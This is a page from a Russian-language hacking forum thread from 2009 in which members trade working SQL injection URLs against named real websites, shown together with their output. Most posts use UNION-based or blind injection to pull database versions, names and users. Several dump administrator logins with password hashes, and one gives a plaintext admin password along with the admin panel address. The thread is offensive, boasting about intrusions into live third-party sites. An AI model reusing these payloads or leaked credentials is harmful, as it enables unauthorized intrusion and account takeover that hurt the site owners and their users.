SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Он делает сайты.....

    http://www.georgeradu.com/index.php?p=portfolio&s=1&page=1&pr=60+UNION+SELECT+1,2,3,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),5,6,7,8,9,10+LIMIT+1,1--



    Database Version: 4.1.22-standard
    Database name: georger_georger
    User name: georger_gr@localhost
     
    #7961 Gorev, 26 Feb 2009
    Last edited: 26 Feb 2009
    2 people like this.
  2. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    шоп...

    шоп...
    Code:
    http://shirleyofhollywood.ru/cat.php?id=-1+union+select+concat_ws(0x3a,uname,pass),2+from+shir_users--
    логин/пасс:

    Code:
    Гость:7b99e31a092a499c08416ce6443ef767
    юзер/версия/бд:

    Code:
    5.0.75:shirley@localhost:ling 
    -------------------------------------------------------------
    The End!
     
    1 person likes this.
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.constantin-flondor.com/index.php?p=lucrari&sub_id=29+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10+LIMIT+1,1--&lang=ro



    Version : 4.1.22-standard
    Database : cflondor_flondor
    User : cflondor_flondor@localhost
     
  4. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    PR: 5
    тИЦ: 850


    Code:
    http://rybakinfo.ru/cgi-bin/salers.cgi?saler=34+union+select+1,concat _ws(0x3a, version(),database(),user()),3,4,5,6,7,8,9,10--
    Database Version : 4.1.22-log
    Database name : db_rinfo81_1
    User name : [email protected]
     
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.alubel.it/_presentation/Alubel_28___Sistema_integrale_per_coperture_e_rivestimenti/1/IT+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8,9,0,1--/



    Database Version: 5.0.67-community
    Database name: alubeln_alubelss
    User name: alubeln_useralub@localhost


    http://www.alubel.it/_presentation/Alubel_28___Sistema_integrale_per_coperture_e_rivestimenti/1/IT+UNION+SELECT+CONCAT_WS(0x3a,adm_username,adm_password,zona,super_user),2,3,4,5,6,7,8,9,10,11+FROM+alubeln_alubeldatabase.admin--/


    veve:6f12d5164b5f02f813af60bc0efc971c:1,2,3,4,5,6,7:1
    raduchiritescu:1f6e20f715ab68a1ab135da4edb1a0c2:1,2,3,4,5,6,7:1
    estero:3137e26fa0c82a9c2076064d3f79b21f:1,2,5:0
    cristina:2303540bf6a504c0fd3a4c3110bea33c:1,2,3,4,5,6,7:1
     
  6. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    http://thebuynsell.com/gallery.php?cid=-1+union+select+1,2,3,4+--+
    http://thebuynsell.com/gallery.php?cid=-1+union+select+1,concat_ws(0x7c,version(),user(),database()),3,4+--+
    http://thebuynsell.com/gallery.php?cid=-1+UNION+SELECT+1,CONCAT(admin_name,pwd),3,4+FROM+auction.sbauctions_admin--

    jokester: сколько-же можно повторять ШЕЛЛЫ ЗАПРЕЩЕНЫ В ПАБЛИКЕ. Читайте правила
     
    #7966 j0ker13, 26 Feb 2009
    Last edited by a moderator: 26 Feb 2009
  7. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    PR: 5
    тИЦ: 850


    Code:
    http://hotel.uralregion.ru/index.php?nview=-1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11--
    Database Version : 5.0.41-log
    Database name : uralregion
    User name : [email protected]


    админы:

    Code:
    http://hotel.uralregion.ru/index.php?nview=-1+union+select+1,concat _ws(0x3a,id,login_name,password),3,4,5,6,7,8,9,10,11+from+login+limit+1,1--
     
  8. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.maxine.ro/stoc-zero.php?id=1979%20UNION%20SELECT%20AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71)%20LIMIT%201,1



    Database Version: 5.0.67-community
    Database name: maxine5_maxine
    User name: maxine5_maxine@localhost
     
    1 person likes this.
  9. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    ТИЦ:2100
    PR:4

    Code:
    http://top.ryazan.ru/stat.php?id=-158+union+select+1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),user(),database()),13,14,15,16,17,18,19,20,21--
    ----------------------------------------------------------
    The End!
     
  10. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.misenashop.ro/produse/detalii/Rochie-cu-volane/777+AND+ASCII(SUBSTRING((select+version())1,1))>x/


    x=52,46,49,46,50,50,45,115,116,97,110,100,97,114,100


    http://www.misenashop.ro/produse/detalii/Rochie-cu-volane/777+AND+ASCII(SUBSTRING((select+database())1,1))>x/

    x=51,49,49,54,48,50,95,109,105,115,101,110,97



    http://www.misenashop.ro/produse/detalii/Rochie-cu-volane/777+AND+ASCII(SUBSTRING((select+user())1,1))>x/


    x=109,105,115,101,110,97,64,56,50,46,55,54,46,50,53,51,46,56,51


    Version : 4.1.22-standard
    Database : 311602_misena
    User : [email protected]
     
    1 person likes this.
  11. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    PR4
    http://www.frosszelnick.com

    http://www.frosszelnick.com/ourfirm/press/view?id=-1'+union+select+1,username,3,4,5,6,password,8,9,10,11,12,13,14,15,16,17,18,19+from+users/*

    login:admin
    pass:fez

    http://www.frosszelnick.com/admin/

    Чпок! добрый вечер!
     
    1 person likes this.
  12. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    915
    Reputations:
    363
    sport-tovari.ru

    Code:
    http://sport-tovari.ru/texts/int.php?id=-6+union+select+1,version()--
    5.0.67-log

    кому на халяву кеды нужны?))

    Code:
    ttp://sport-tovari.ru/admin/
    а вот и админка, но она на бесик авторизации =(((

    тиц 110
    пр 5
     
    _________________________
    1 person likes this.
  13. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Pagerank: 5
    тИЦ: 1900


    Code:
    http://www.logistic.ru/news/news.php?num=2009/02/26/16/99999+union+select+1,2,3,4,5,6,concat _ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15--
    Database Version : 5.0.54-log
    Database name : bo_logistic
    User name : katalog@localhost
     
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.tradati-in-dragoste.ro/poveste/tradarea-doare/68+AND+ASCII(SUBSTRING((select+version()),1,1))=x/


    x=52,46,49,46,50,50,45,115,116,97,110,100,97,114,100,45,108,111,103


    http://www.tradati-in-dragoste.ro/poveste/tradarea-doare/68+AND+ASCII(SUBSTRING((select+database()),1,1))=x/


    x=116,114,97,100,97,116,105,95,116,114,97,100,97,116,105




    http://www.tradati-in-dragoste.ro/poveste/tradarea-doare/68+AND+ASCII(SUBSTRING((select+user()),1,1))=x/


    x=116,114,97,100,97,116,105,95,109,105,104,97,101,108,97,64,108,111,99,97,108,104,111,115,116


    User : tradati_mihaela@localhost
    Database : tradati_tradati
    Version : 4.1.22-standard-log
     
  15. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Pagerank: 5
    тИЦ: 1600


    Code:
    http://www.pecom.ru/ru/news/index.php?id=9999999999+union+select+1,2,concat _ws(0x3a ,version(),database(),user()),4,5,6,7,8,9,10--
    Database Version : 5.0.45
    Database name : pecomru
    User name : pecomru@localhost


    админы:
    Code:
    http://www.pecom.ru/ru/news/index.php?id=9999999999+union+select+1,2,concat_ ws(0x3a, username,password), 4,5,6,7,8,9,10+from+npk_users--
    Code:
    Root:e2ca9349eaf2653b87d267c3ff20267f
    Admin:cc07f226b4a09bed098607093a2db221
    Lyuda:e077e1a544eec4f0307cf5c3c721d944
    Richard:202cb962ac59075b964b07152d234b70
    Feda:da2328ee004685ffa97c2d811a200c86
    nvm:827ccb0eea8a706c4c34a16891f84e7b
    admin1:21232f297a57a5a743894a0e4a801fc3
     
  16. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,663
    Likes Received:
    915
    Reputations:
    363
    Code:
    http://www.bidbuysells.com/auction_details.php?name=PHP-ProBid-Mods-v60603-Italian-Language-Pack&auction_id=-113067+union+select+1,2--
     
    _________________________
    1 person likes this.
  17. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    http://www.airrider.com/store/category.php?cookiecheck=true&cat=-33+union+select+version()--

    version():5.0.67-community
    user():airrider_airride@localhost
     
  18. f1ng3r

    f1ng3r [забытый полк]

    Joined:
    14 Jan 2009
    Messages:
    529
    Likes Received:
    413
    Reputations:
    256
    Pagerank: 6
    тИЦ: 2000


    Code:
    http://www.akdi.ru/scripts/novosti/smotri.php?z=9999999+union+select+1,concat _ws(0x3a,versio n(),database(),user()),3,4--
    Database Version : 5.0.67-log
    Database name : u74105_akdi
    User name : [email protected]


    админ:

    Code:
    http://www.akdi.ru/scripts/novosti/smotri.php?z=9999999+union+select+1,concat_ ws(0x3a,name ,password),3,4+from+admin--
    Code:
    Admin:profforumakdi
     
  19. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.bebeunivers.ro/detalii_produs.php?id_cat=&id_p=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23




    Version : 4.1.22-standard-log
    Database : bebeuniv_bebeunivers
    User : [email protected]
     
    1 person likes this.
  20. Assembler

    Assembler Elder - Старейшина

    Joined:
    1 Sep 2007
    Messages:
    173
    Likes Received:
    102
    Reputations:
    23
    Code:
    http://www.golc.jp
    PR: 2
    Тиц: 10
    Версия: 5.0.67-community-log
    База данных: global_AutoLibrary
    Юзверь: global_admin@localhost
    Code:
    http://www.golc.jp/library/make.php?ID=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20--
     
Thread Status:
Not open for further replies.